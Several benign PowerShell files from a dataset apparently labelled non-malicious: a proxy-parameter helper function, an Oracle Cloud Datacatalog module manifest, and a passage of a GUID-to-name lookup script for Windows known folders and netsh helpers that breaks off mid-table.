8J+NMeTAZBAAdwtgBZv6kUzKtdbnIQr7shkVVqr/lA5gu/h8gZNNfgUHFwxOm9FV # CKbpqfT/qwKNssemHvAPEakccoQZDkR5j78++vS2GApZByN4D2h2v9q+mDXzqxMr # bnkvKHzVokvKF0cVJU414FjrK71yL+NGn6bD2Lb9XY0U+ZuCvN+DL8f1Xf/BOPC5 # OG6roKU9vxbuDj8GssLAK49sT5efsMJAOnaAQeLy2y4aUzidNJei9d1S1plZVL8M # jw== # SIG # End signature block
combined_dataset/train/non-malicious/4409.ps1
4409.ps1
function Get-ParametersHashtable { param( $Proxy, $ProxyCredential ) $ParametersHashtable = @{} if($Proxy) { $ParametersHashtable[$script:Proxy] = $Proxy } if($ProxyCredential) { $ParametersHashtable[$script:ProxyCredential] = $ProxyCredential } return $ParametersHashtable }
combined_dataset/train/non-malicious/sample_31_50.ps1
sample_31_50.ps1
# # Module manifest for module 'OCI.PSModules.Datacatalog' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Datacatalog.dll' # Version number of this module. ModuleVersion = '80.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'f0444859-1d26-4a2d-8bcd-5551939e4f94' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Datacatalog Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '80.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Datacatalog.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCIDatacatalogCatalogLock', 'Add-OCIDatacatalogCatalogPrivateEndpointLock', 'Add-OCIDatacatalogDataSelectorPatterns', 'Add-OCIDatacatalogMetastoreLock', 'Confirm-OCIDatacatalogConnection', 'Confirm-OCIDatacatalogPattern', 'DisMount-OCIDatacatalogCatalogPrivateEndpoint', 'Export-OCIDatacatalogGlossary', 'Get-OCIDatacatalogAggregatedPhysicalEntitiesList', 'Get-OCIDatacatalogAttribute', 'Get-OCIDatacatalogAttributesList', 'Get-OCIDatacatalogAttributeTag', 'Get-OCIDatacatalogAttributeTagsList', 'Get-OCIDatacatalogCatalog', 'Get-OCIDatacatalogCatalogPrivateEndpoint', 'Get-OCIDatacatalogCatalogPrivateEndpointsList', 'Get-OCIDatacatalogCatalogsList', 'Get-OCIDatacatalogConnection', 'Get-OCIDatacatalogConnectionsList', 'Get-OCIDatacatalogCustomPropertiesList', 'Get-OCIDatacatalogCustomProperty', 'Get-OCIDatacatalogDataAsset', 'Get-OCIDatacatalogDataAssetsList', 'Get-OCIDatacatalogDataAssetTag', 'Get-OCIDatacatalogDataAssetTagsList', 'Get-OCIDatacatalogDerivedLogicalEntitiesList', 'Get-OCIDatacatalogEntitiesList', 'Get-OCIDatacatalogEntity', 'Get-OCIDatacatalogEntityTag', 'Get-OCIDatacatalogEntityTagsList', 'Get-OCIDatacatalogFolder', 'Get-OCIDatacatalogFoldersList', 'Get-OCIDatacatalogFolderTag', 'Get-OCIDatacatalogFolderTagsList', 'Get-OCIDatacatalogGlossariesList', 'Get-OCIDatacatalogGlossary', 'Get-OCIDatacatalogJob', 'Get-OCIDatacatalogJobDefinition', 'Get-OCIDatacatalogJobDefinitionsList', 'Get-OCIDatacatalogJobExecution', 'Get-OCIDatacatalogJobExecutionsList', 'Get-OCIDatacatalogJobLog', 'Get-OCIDatacatalogJobLogsList', 'Get-OCIDatacatalogJobMetrics', 'Get-OCIDatacatalogJobMetricsList', 'Get-OCIDatacatalogJobsList', 'Get-OCIDatacatalogMetastore', 'Get-OCIDatacatalogMetastoresList', 'Get-OCIDatacatalogNamespace', 'Get-OCIDatacatalogNamespacesList', 'Get-OCIDatacatalogPattern', 'Get-OCIDatacatalogPatternsList', 'Get-OCIDatacatalogRulesList', 'Get-OCIDatacatalogTagsList', 'Get-OCIDatacatalogTerm', 'Get-OCIDatacatalogTermRelationship', 'Get-OCIDatacatalogTermRelationshipsList', 'Get-OCIDatacatalogTermsList', 'Get-OCIDatacatalogType', 'Get-OCIDatacatalogTypesList', 'Get-OCIDatacatalogWorkRequest', 'Get-OCIDatacatalogWorkRequestErrorsList', 'Get-OCIDatacatalogWorkRequestLogsList', 'Get-OCIDatacatalogWorkRequestsList', 'Import-OCIDatacatalogConnection', 'Import-OCIDatacatalogDataAsset', 'Import-OCIDatacatalogGlossary', 'Invoke-OCIDatacatalogAssociateCustomProperty', 'Invoke-OCIDatacatalogAsynchronousExportDataAsset', 'Invoke-OCIDatacatalogAsynchronousExportGlossary', 'Invoke-OCIDatacatalogDisassociateCustomProperty', 'Invoke-OCIDatacatalogExpandTreeForGlossary', 'Invoke-OCIDatacatalogFetchEntityLineage', 'Invoke-OCIDatacatalogObjectStats', 'Invoke-OCIDatacatalogParseConnection', 'Invoke-OCIDatacatalogProcessRecommendation', 'Invoke-OCIDatacatalogRecommendations', 'Invoke-OCIDatacatalogSearchCriteria', 'Invoke-OCIDatacatalogSuggestMatches', 'Invoke-OCIDatacatalogSynchronousExportDataAsset', 'Invoke-OCIDatacatalogTestConnection', 'Invoke-OCIDatacatalogUsers', 'Mount-OCIDatacatalogCatalogPrivateEndpoint', 'Move-OCIDatacatalogCatalogCompartment', 'Move-OCIDatacatalogCatalogPrivateEndpointCompartment', 'Move-OCIDatacatalogMetastoreCompartment', 'New-OCIDatacatalogAttribute', 'New-OCIDatacatalogAttributeTag', 'New-OCIDatacatalogCatalog', 'New-OCIDatacatalogCatalogPrivateEndpoint', 'New-OCIDatacatalogConnection', 'New-OCIDatacatalogCustomProperty', 'New-OCIDatacatalogDataAsset', 'New-OCIDatacatalogDataAssetTag', 'New-OCIDatacatalogEntity', 'New-OCIDatacatalogEntityTag', 'New-OCIDatacatalogFolder', 'New-OCIDatacatalogFolderTag', 'New-OCIDatacatalogGlossary', 'New-OCIDatacatalogJob', 'New-OCIDatacatalogJobDefinition', 'New-OCIDatacatalogJobExecution', 'New-OCIDatacatalogMetastore', 'New-OCIDatacatalogNamespace', 'New-OCIDatacatalogPattern', 'New-OCIDatacatalogTerm', 'New-OCIDatacatalogTermRelationship', 'Remove-OCIDatacatalogAttribute', 'Remove-OCIDatacatalogAttributeTag', 'Remove-OCIDatacatalogCatalog', 'Remove-OCIDatacatalogCatalogLock', 'Remove-OCIDatacatalogCatalogPrivateEndpoint', 'Remove-OCIDatacatalogCatalogPrivateEndpointLock', 'Remove-OCIDatacatalogConnection', 'Remove-OCIDatacatalogCustomProperty', 'Remove-OCIDatacatalogDataAsset', 'Remove-OCIDatacatalogDataAssetTag', 'Remove-OCIDatacatalogDataSelectorPatterns', 'Remove-OCIDatacatalogEntity', 'Remove-OCIDatacatalogEntityTag', 'Remove-OCIDatacatalogFolder', 'Remove-OCIDatacatalogFolderTag', 'Remove-OCIDatacatalogGlossary', 'Remove-OCIDatacatalogJob', 'Remove-OCIDatacatalogJobDefinition', 'Remove-OCIDatacatalogMetastore', 'Remove-OCIDatacatalogMetastoreLock', 'Remove-OCIDatacatalogNamespace', 'Remove-OCIDatacatalogPattern', 'Remove-OCIDatacatalogTerm', 'Remove-OCIDatacatalogTermRelationship', 'Update-OCIDatacatalogAttribute', 'Update-OCIDatacatalogCatalog', 'Update-OCIDatacatalogCatalogPrivateEndpoint', 'Update-OCIDatacatalogConnection', 'Update-OCIDatacatalogCustomProperty', 'Update-OCIDatacatalogDataAsset', 'Update-OCIDatacatalogEntity', 'Update-OCIDatacatalogFolder', 'Update-OCIDatacatalogGlossary', 'Update-OCIDatacatalogJob', 'Update-OCIDatacatalogJobDefinition', 'Update-OCIDatacatalogMetastore', 'Update-OCIDatacatalogNamespace', 'Update-OCIDatacatalogPattern', 'Update-OCIDatacatalogTerm', 'Update-OCIDatacatalogTermRelationship', 'Write-OCIDatacatalogCredentials' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Datacatalog' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/2775.ps1
2775.ps1
[CmdletBinding()] Param( [Parameter(Mandatory=$True,ValueFromPipeLine=$True,Position=0)] [String]$GUID ) Begin { $GUIDPattern = New-Object System.Text.RegularExpressions.Regex "([A-Fa-f0-9]{8}(?:-[A-Fa-f0-9]{4}){3}-[A-Fa-f0-9]{12})" $MSWinGUIDHT = @{ "DE61D971-5EBC-4F02-A3A9-6C82895E5C04" = "AddNewPrograms" "724EF170-A42D-4FEF-9F26-B60E846FBA4F" = "AdminTools" "A520A1A4-1780-4FF6-BD18-167343C5AF16" = "AppDataLow" "A305CE99-F527-492B-8B1A-7E76FA98D6E4" = "AppUpdates" "9E52AB10-F80D-49DF-ACB8-4330F5687855" = "CDBurning" "DF7266AC-9274-4867-8D55-3BD661DE872D" = "ChangeRemovePrograms" "D0384E7D-BAC3-4797-8F14-CBA229B392B5" = "CommonAdminTools" "C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D" = "CommonOEMLinks" "0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8" = "CommonPrograms" "A4115719-D62E-491D-AA7C-E74B8BE3B067" = "CommonStartMenu" "82A5EA35-D9CD-47C5-9629-E15D2F714E6E" = "CommonStartup" "B94237E7-57AC-4347-9151-B08C6C32D1F7" = "CommonTemplates" "0AC0837C-BBF8-452A-850D-79D08E667CA7" = "Computer" "4BFEFB45-347D-4006-A5BE-AC0CB0567192" = "Conflict" "6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD" = "Connections" "56784854-C6CB-462B-8169-88E350ACB882" = "Contacts" "82A74AEB-AEB4-465C-A014-D097EE346D63" = "ControlPanel" "2B0F765D-C0E9-4171-908E-08A611B84FF6" = "Cookies" "B4BFCC3A-DB2C-424C-B029-7FE99A87C641" = "Desktop" "FDD39AD0-238F-46AF-ADB4-6C85480369C7" = "Documents" "374DE290-123F-4565-9164-39C4925E467B" = "Downloads" "1777F761-68AD-4D8A-87BD-30B759FA33DD" = "Favorites" "FD228CB7-AE11-4AE3-864C-16F3910AB8FE" = "Fonts" "CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434" = "Games" "054FAE61-4DD8-4787-80B6-090220C4B700" = "GameTasks" "D9DC8A3B-B784-432E-A781-5A1130A75963" = "History" "4D9F7874-4E0C-4904-967B-40B0D20C3E4B" = "Internet" "352481E8-33BE-4251-BA85-6007CAEDCF9D" = "InternetCache" "BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968" = "Links" "F1B32785-6FBA-4FCF-9D55-7B8E7F157091" = "LocalAppData" "2A00375E-224C-49DE-B8D1-440DF7EF3DDC" = "LocalizedResourcesDir" "4BD8D571-6D19-48D3-BE97-422220080E43" = "Music" "C5ABBF53-E17F-4121-8900-86626FC2C973" = "NetHood" "D20BEEC4-5CA8-4905-AE3B-BF251EA09B53" = "Network" "2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39" = "OriginalImages" "69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C" = "PhotoAlbums" "33E28130-4E1E-4676-835A-98395C3BC3BB" = "Pictures" "DE92C1C7-837F-4F69-A3BB-86E631204A23" = "Playlists" "76FC4E2D-D6AD-4519-A663-37BD56068185" = "Printers" "9274BD8D-CFD1-41C3-B35E-B13F55A758F4" = "PrintHood" "5E6C858F-0E22-4760-9AFE-EA3317B67173" = "Profile" "62AB5D82-FDC1-4DC3-A9DD-070D1D495D97" = "ProgramData" "905E63B6-C1BF-494E-B29C-65B732D3D21A" = "ProgramFiles" "F7F1ED05-9F6D-47A2-AAAE-29D317C6F066" = "ProgramFilesCommon" "6365D5A7-0F0D-45E5-87F6-0DA56B6A4F7D" = "ProgramFilesCommonX64" "DE974D24-D9C6-4D3E-BF91-F4455120B917" = "ProgramFilesCommonX86" "6D809377-6AF0-444B-8957-A3773F02200E" = "ProgramFilesX64" "7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E" = "ProgramFilesX86" "A77F5D77-2E2B-44C3-A6A2-ABA601054A51" = "Programs" "DFDF76A2-C82A-4D63-906A-5644AC457385" = "Public" "C4AA340D-F20F-4863-AFEF-F87EF2E6BA25" = "PublicDesktop" "ED4824AF-DCE4-45A8-81E2-FC7965083634" = "PublicDocuments" "3D644C9B-1FB8-4F30-9B45-F670235F79C0" = "PublicDownloads" "DEBF2536-E1A8-4C59-B6A2-414586476AEA" = "PublicGameTasks" "3214FAB5-9757-4298-BB61-92A9DEAA44FF" = "PublicMusic" "B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5" = "PublicPictures" "2400183A-6185-49FB-A2D8-4A392A602BA3" = "PublicVideos" "52A4F021-7B75-48A9-9F6B-4B87A210BC8F" = "QuickLaunch" "AE50C081-EBD2-438A-8655-8A092E34987A" = "Recent" "BD85E001-112E-431E-983B-7B15AC09FFF1" = "RecordedTV" "B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC" = "RecycleBin" "8AD10C31-2ADB-4296-A8F7-E4701232C972" = "ResourceDir" "3EB685DB-65F9-4CF6-A03A-E3EF65729F3D" = "RoamingAppData" "B250C668-F57D-4EE1-A63C-290EE7D1AA1F" = "SampleMusic" "C4900540-2379-4C75-844B-64E6FAF8716B" = "SamplePictures" "15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5" = "SamplePlaylists" "859EAD94-2E85-48AD-A71A-0969CB56A6CD" = "SampleVideos" "4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4" = "SavedGames" "7D1D3A04-DEBB-4115-95CF-2F29DA2920DA" = "SavedSearches" "EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E" = "SEARCH_CSC" "98EC0E18-2098-4D44-8644-66979315A281" = "SEARCH_MAPI" "190337D1-B8CA-4121-A639-6D472D16972A" = "SearchHome" "8983036C-27C0-404B-8F08-102D10DCFD74" = "SendTo" "7B396E54-9EC5-4300-BE0A-2482EBAE1A26" = "SidebarDefaultParts" "A75D362E-50FC-4FB7-AC2C-A8BEAA314493" = "SidebarParts" "625B53C3-AB48-4EC1-BA1F-A1EF4146FC19" = "StartMenu" "B97D20BB-F46A-4C97-BA10-5E3608430854" = "Startup" "43668BF8-C14E-49B2-97C9-747784D784B7" = "SyncManager" "289A9A43-BE44-4057-A41B-587A76D7E7F9" = "SyncResults" "0F214138-B1D3-4A90-BBA9-27CBC0C5389A" = "SyncSetup" "1AC14E77-02E7-4E5D-B744-2EB1AE5198B7" = "System" "D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27" = "SystemX86" "A63293E8-664E-48DB-A079-DF759E0509F7" = "Templates" "5B3749AD-B49F-49C1-83EB-15370FBD4882" = "TreeProperties" "0762D272-C50A-4BB0-A382-697DCD729B80" = "UserProfiles" "F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F" = "UsersFiles" "18989B1D-99B5-455B-841C-AB7C74E4DDFC" = "Videos" "F38BF404-1D43-42F2-9305-67DE0B28FC23" = "Windows" } $NetshShowHelperGUIDHT = @{ "00770721-44EA-11D5-93BA-00B0D022DD1F" = "HNETMON.DLL bridge" "02BC1F81-D927-4EC5-8CBC-8DD65E3E38E8" = "AUTHFWCFG.DLL advfirewall" "0705ECA1-7AAC-11D2-89DC-006008B0E5B9" = "IFMON.DLL interface, ras" "0BFDC146-56A3-4311-A7D5-7D9953F8326E" = "WHHELPER.DLL winhttp" "13D12A78-D0FB-11D2-9B76-00104BCA495B" = "RASMONTR.DLL ip" "1C151866-F35B-4780-8CD2-E1924E9F03E1" = "NETIOHLP.DLL 6to4, isatap, portproxy, teredo" "1D8240C7-48B9-47CC-9E40-4F7A0A390E71" = "DOT3CFG.DLL lan" "1DD4935A-E587-4D16-AE27-14E40385AB12" = "P2PNETSH.DLL cloud" "35342B49-83B4-4FCC-A90D-278533D5BEA2" = "AUTHFWCFG.DLL firewall" "36B3EF76-94C1-460F-BD6F-DF0178D90EAC" = "RASMONTR.DLL ipv6" "3BB6DA1D-AC0C-4972-AC05-B22F49DEA9B6" = "NSHWFP.DLL wfp" "42E3CC21-098C-11D3-8C4D-00104BCA495B" = "RASMONTR.DLL aaaa" "44F3288B-DBFF-4B31-A86E-633F50D706B3" = "NSHHTTP.DLL http" "4BD827F7-1E83-462D-B893-F33A80C5DE1D" = "AUTHFWCFG.DLL mainmode" "4D0FEFCB-8C3E-4CDE-B39B-325933727297" = "AUTHFWCFG.DLL monitor" "500F32FD-7064-476B-8FD6-2171EA46428F" = "NETIOHLP.DLL ipv6" "555EA58E-72B1-4F0A-9055-779D0F5400B2" = "PEERDISTSH.DLL smb" "592852F7-5F6F-470B-9097-C5D33B612975" = "RPCNSH.DLL rpc" "6DC31EC5-3583-4901-9E28-37C28113656A" = "DHCPCMONITOR.DLL dhcpclient" "6EC05238-F6A3-4801-967A-5C9D6F6CAC50" = "P2PNETSH.DLL peer" "725588AC-7A11-4220-A121-C92C915E8B73" = "NETIOHLP.DLL ipv4" "78197B47-2BEF-49CA-ACEB-D8816371BAA8" = "NETIOHLP.DLL tcp" "8A6D23B3-0AF2-4101-BC6E-8114B325FE17" = "NETIOHLP.DLL dnsclient" "8B3A0D7F-1F30-4402-B753-C4B2C7607C97" = "FWCFG.DLL firewall" "90E1CBE1-01D9-4174-BB4D-EB97F3F6150D" = "NETIOHLP.DLL 6to4, isatap" "90FE6CFC-B6A2-463B-AA12-25E615EC3C66" = "RASMONTR.DLL diagnostics" "931852E2-597D-40B9-B927-55FFC81A6104" = "NETIOHLP.DLL netio" "97C192DB-A774-43E6-BE78-1FABD795EEAB" = "NETIOHLP.DLL httpstunnel" "9AA625FC-7E31-4679-B5B5-DFC67A3510AB" = "P2PNETSH.DLL database" "9E0D63D6-4644-476B-9DAC-D64F96E01376" = "P2PNETSH.DLL pnrp" "A31CB05A-1213-4F4E-B420-0EE908B896CB" = "PEERDISTSH.DLL branchcache" "AD1D76C9-434B-48E0-9D2C-31FA93D9635A" = "P2PNETSH.DLL diagnostics" "B2C0EEF4-CCE5-4F55-934E-ABF60F3DCF56" = "WSHELPER.DLL winsock" "B341E8BA-13AA-4E08-8CF1-A6F2D8B0C229" = "NETIOHLP.DLL namespace" "B7BE4347-E851-4EEC-BC65-B0C0E87B86E3" = "P2PNETSH.DLL p2p" "C07E293F-9531-4426-8E5C-D7EBBA50F693" = "RPCNSH.DLL filter" "D424E730-1DB7-4287-8C9B-0774F5AD0576" = "WLANCFG.DLL wlan" "E35A9D1F-61E8-4CF5-A46C-0F715A9303B8" = "P2PNETSH.DLL group" "F7E0BC27-BA6E-4145-A123-012F1922F3F1" = "NSHIPSEC.DLL ipsec, static, dynamic" "FB10CBCA-5430-46CE-B732-079B4E23BE24" = "AUTHFWCFG.DLL consec" "FBFC037E-D455-4B8D-80A5-B379002DBCAD" = "P2PNETSH.DLL idmgr" } $EZGuidHT = @{ "008CA0B1-55B4-4C56-B8A8-4DE4B299D3BE" = "Account Pictures" "BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6" = "Action Center" "88C6C381-2E85-11D0-94DE-444553540000" = "ActiveX Cache Folder" "7A979262-40CE-46FF-AEEE-7884AC3B6136" = "Add Hardware" "D4480A50-BA28-11D1-8E75-00C04FA31A86" = "Add Network Place" "D0384E7D-BAC3-4797-8F14-CBA229B392B5" = "Administrative Tools" "724EF170-A42D-4FEF-9F26-B60E846FBA4F" = "Administrative tools" "D20EA4E1-3957-11D2-A40B-0C5020524153" = "Administrative Tools" "F90C627B-7280-45DB-BC26-CCE7BDD620A4" = "All Tasks" "ED7BA470-8E54-465E-825C-99712043E01C" = "All Tasks" "64693913-1C21-4F30-A98F-4E52906D3B56" = "App Instance Folder" "A3918781-E5F2-4890-B3D9-A7E54332328C" = "Application Shortcuts" "C57A6066-66A3-4D91-9EB9-41532179F0A5" = "Application Suggested Locations" "1E87508D-89C2-42F0-8A7E-645A0F50CA58" = "Applications" "4234D49B-0245-4DF3-B780-3893943456E1" = "Applications" "9C60DE1E-E5FC-40F4-A487-460851A8D915" = "Auto Play" "B98A2BEA-7D42-4558-8BD1-832F41BAC6FD" = "Backup And Restore (Backup and Restore Center)" "335A31DD-F04B-4D76-A925-D6B47CF360DF" = "Backup and Restore Center" "0142E4D0-FB7A-11DC-BA4A-000FFE7AB428" = "Biometric Devices(Biometrics)" "28803F59-3A75-4058-995F-4EE5503B023C" = "Bluetooth Devices" "85BBD920-42A0-1069-A2E4-08002B30309D" = "Briefcase" "0CD7A5C0-9F37-11CE-AE65-08002B2E1262" = "Cabinet File" "AB5FB87B-7CE2-4F83-915D-550846C9537B" = "Camera Roll" "767E6811-49CB-4273-87C2-20F355E1085B" = "Camera Roll" "BD7A2E7B-21CB-41B2-A086-B309680C6B7E" = "Client Side Cache Folder" "B2C761C6-29BC-4F19-9251-E6195265BAF1" = "Color Management" "437FF9C0-A07F-4FA0-AF80-84B6C6440A16" = "Command Folder" "DE974D24-D9C6-4D3E-BF91-F4455120B917" = "Common Files" "F7F1ED05-9F6D-47A2-AAAE-29D317C6F066" = "Common Files" "6365D5A7-0F0D-45E5-87F6-0DA56B6A4F7D" = "Common Files" "323CA680-C24D-4099-B94D-446DD2D7249E" = "Common Places" "D34A6CA6-62C2-4C34-8A7C-14709C1AD938" = "Common Places FS Folder" "E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31" = "Compressed Folder" "80213E82-BCFD-4C4F-8817-BB27601267A9" = "Compressed Folder (zip folder)" "0AC0837C-BBF8-452A-850D-79D08E667CA7" = "Computer" "F02C1A0D-BE21-4350-88B0-7367FC96EF3C" = "Computers and Devices" "3C5C43A3-9CE9-4A9B-9699-2AC0CF6CC4BF" = "Configure Wireless Network" "4BFEFB45-347D-4006-A5BE-AC0CB0567192" = "Conflicts" "38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B" = "Connect To" "DE2B70EC-9BF7-4A93-BD3D-243F7881D492" = "Contacts" "56784854-C6CB-462B-8169-88E350ACB882" = "Contacts" "26EE0668-A00A-44D7-9371-BEB064C98683" = "Control Panel" "82A74AEB-AEB4-465C-A014-D097EE346D63" = "Control Panel" "21EC2020-3AEA-1069-A2DD-08002B30309D" = "Control Panel" "5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0" = "Control Panel command object for Start menu and desktop" "2B0F765D-C0E9-4171-908E-08A611B84FF6" = "Cookies" "1206F5F1-0569-412C-8FEC-3204630DFB70" = "Credential Manager" "E2E7934B-DCE5-43C4-9576-7FE4F75E7480" = "Date and Time" "B2952B16-0E07-4E5A-B993-58C52CB94CAE" = "DB Folder" "00C6D95F-329C-409A-81D7-C46C66EA7F33" = "Default Location" "17CD9488-1228-4B2F-88CE-4298E93E0966" = "Default Programs" "B155BDF8-02F0-451E-9A26-AE317CFD7779" = "Delegate folder that appears in Computer" "DFFACDC5-679F-4156-8947-C5C76BC0B67F" = "Delegate folder that appears in Users Files Folder" "B4BFCC3A-DB2C-424C-B029-7FE99A87C641" = "Desktop" "37EFD44D-EF8D-41B1-940D-96973A50E9E0" = "Desktop Gadgets" "C2B136E2-D50E-405C-8784-363C582BF43E" = "Device Center Initialization" "A8A91A66-3A7D-4424-8D24-04E180695C7A" = "Device Center(Devices and Printers)" "74246BFC-4C96-11D0-ABEF-0020AF6B0B7A" = "Device Manager" "AEE2420F-D50E-405C-8784-363C582BF45A" = "Device Pairing Folder" "5CE4A5E9-E4EB-479D-B89F-130C02886155" = "DeviceMetadataStore" "FE1290F0-CFBD-11CF-A330-00AA00C16E65" = "Directory" "C555438B-3C23-4769-A71F-B6D3D9B6053A" = "Display" "D2035EDF-75CB-4EF1-95A7-410D9EE17170" = "DLNA Content Directory Data Source" "289AF617-1CC3-42A6-926C-E6A863F0E3BA" = "DLNA Media Servers Data Source" "A8CDFF1C-4878-43BE-B5FD-F8091C1C60D0" = "Documents" "FDD39AD0-238F-46AF-ADB4-6C85480369C7" = "Documents" "7B0DB17D-9CD2-4A93-9733-46CC89022E7C" = "Documents" "24D89E24-2F19-4534-9DDE-6A6671FBB8FE" = "Documents" "7D49D726-3C21-4F05-99AA-FDC2C9474656" = "Documents folder" "3F98A740-839C-4AF7-8C36-5BADFB33D5FD" = "Documents library" "FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9" = "Documents Library" "36011842-DCCC-40FE-AA3D-6177EA401788" = "Documents Search Results" "374DE290-123F-4565-9164-39C4925E467B" = "Downloads" "8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA" = "DXP" "D555645E-D4F8-4C29-A827-D93C859C4F2A" = "Ease of Access" "2559A1F5-21D7-11D4-BDAF-00C04F60B9F0" = "E-mail" "9113A02D-00A3-46B9-BC5F-9C04DADDD5D7" = "Enhanced Storage Data Source" "418C8B64-5463-461D-88E0-75E2AFA3C6FA" = "Explorer Browser Results Folder" "692F0339-CBAA-47E6-B5B5-3B84DB604E87" = "Extensions Manager Folder" "1777F761-68AD-4D8A-87BD-30B759FA33DD" = "Favorites" "8343457C-8703-410F-BA8B-8B026E431743" = "Feedback Tool" "877CA5AC-CB41-4842-9C69-9136E42D47E2" = "File Backup Index" "2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467" = "File History Data Source" "6DFD7C5C-2451-11D3-A299-00C04F8EF6AF" = "Folder Options" "0AFACED1-E828-11D1-9187-B532F1E9575D" = "Folder Shortcut" "93412589-74D4-4E4E-AD0E-E0CB621440FD" = "Font Settings" "FD228CB7-AE11-4AE3-864C-16F3910AB8FE" = "Fonts" "D20EA4E1-3957-11D2-A40B-0C5020524152" = "Fonts" "1D2680C9-0E2A-469D-B787-065558BC7D43" = "Fusion Cache" "A75D362E-50FC-4FB7-AC2C-A8BEAA314493" = "Gadgets" "7B396E54-9EC5-4300-BE0A-2482EBAE1A26" = "Gadgets" "259EF4B1-E6C9-4176-B574-481532C9BCE8" = "Game Controllers" "DEBF2536-E1A8-4C59-B6A2-414586476AEA" = "GameExplorer" "054FAE61-4DD8-4787-80B6-090220C4B700" = "GameExplorer" "CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434" = "Games" "B689B0D0-76D3-4CBB-87F7-585D0E0CE070" = "Games folder" "DA3F6866-35FE-4229-821A-26553A67FC18" = "General (Generic) library" "5C4F28B5-F869-4E84-8E60-F11DB97C5CC7" = "Generic (All folder items)" "5F4EAB9A-6833-4F61-899D-31CF46979D49" = "Generic library" "7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943" = "Generic Search Results" "DE61D971-5EBC-4F02-A3A9-6C82895E5C04" = "Get Programs" "2559A1F1-21D7-11D4-BDAF-00C04F60B9F0" = "Help and Support" "5FCD4425-CA3A-48F4-A57C-B8A75C32ACB1" = "Hewlett-Packard Recovery (Protect.dll)" "FF393560-C2A7-11CF-BFF4-444553540000" = "History" "0D4C3DB6-03A3-462F-A0E6-08924C41B5D4" = "History" "D9DC8A3B-B784-432E-A781-5A1130A75963" = "History" "F6B6E965-E9B2-444B-9286-10C9152EDBC5" = "History Vault" "679F85CB-0220-4080-B29B-5540CC05AAB6" = "Home Folder" "67CA7650-96E6-4FDD-BB43-A8E774F73A57" = "Home Group Control Panel (Home Group)" "52528A6B-B9E3-4ADD-B60D-588C2DBA842D" = "Homegroup" 